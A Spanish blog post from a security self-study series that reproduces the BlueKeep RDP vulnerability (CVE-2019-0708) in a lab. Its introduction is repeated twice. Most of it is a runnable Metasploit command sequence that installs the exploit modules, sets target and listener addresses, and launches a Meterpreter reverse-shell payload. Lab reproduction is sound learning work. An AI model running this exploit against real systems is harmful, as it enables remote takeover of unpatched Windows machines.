
Este artículo compartirá la vulnerabilidad del servicio de Escritorio remoto de Windows (CVE-2019-0708) y explicará en detalle dicha vulnerabilidad y las medidas de defensa. Siendo el autor un principiante en seguridad informática, comparte algunos tutoriales básicos de autoaprendizaje, principalmente notas en línea sobre herramientas de seguridad y operaciones prácticas, esperando que les gusten. Al mismo tiempo, espero que puedan practicar y progresar junto conmigo; más adelante profundizaré en el conocimiento de seguridad de redes y de sistemas y compartiré experimentos relacionados. En resumen, espero que esta serie de artículos sea de ayuda para los amigos del blog. Escribir no es fácil; expertos, si no les agrada, no critiquen, ¡gracias!
Este artículo compartirá la vulnerabilidad del servicio de escritorio remoto de Windows (CVE-2019-0708) y explicará en detalle dicha vulnerabilidad y sus medidas de defensa. Como principiante en seguridad cibernética, el autor comparte algunos tutoriales básicos de autoaprendizaje, principalmente notas en línea sobre herramientas de seguridad y prácticas operativas. Espero que les gusten. Además, espero que puedan operar y progresar junto a mí; en el futuro profundizaré en el conocimiento de la seguridad de redes y sistemas y compartiré experimentos relacionados. En resumen, espero que esta serie de artículos sea de ayuda para los amigos del blog. No es fácil escribir artículos, maestros, si no les gusta, no critiquen. ¡Gracias!
Blog correspondiente:
[Serie de autoaprendizaje de seguridad cibernética] 58. Reanálisis de CVE-2019-0708 y shell inverso de Metasploit en la explotación de vulnerabilidades de Windows
[Serie de autoaprendizaje de seguridad cibernética] 44. Reproducción y explicación detallada de la vulnerabilidad del servicio de escritorio remoto de Windows (CVE-2019-0708)
Comandos principales:
# 复制文件
cp ./rdp/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp ./rdp/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
# 开启工具
msfconsole
reload_all
search 0708
# 使用脚本
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
# 查看信息
show options
show targets
info
# 设置监听地址、目标地址、反弹payload、目标类型
set rhosts 192.168.44.132
set lhost 192.168.44.129
set rdp_client_ip 192.168.44.129
set payload windows/x64/meterpreter/reverse_tcp
unset RDP_CLIENT_NAME
set target 3
# 运行脚本
run
exploit
# 设置带宽
Set GROOMSIZE 40
Referencias:
[1] https://github.com/rapid7/metasploit-framework/pull/12283?from=groupmessage&isappinstalled=0
[2] https://github.com/n1xbyte/CVE-2019-0708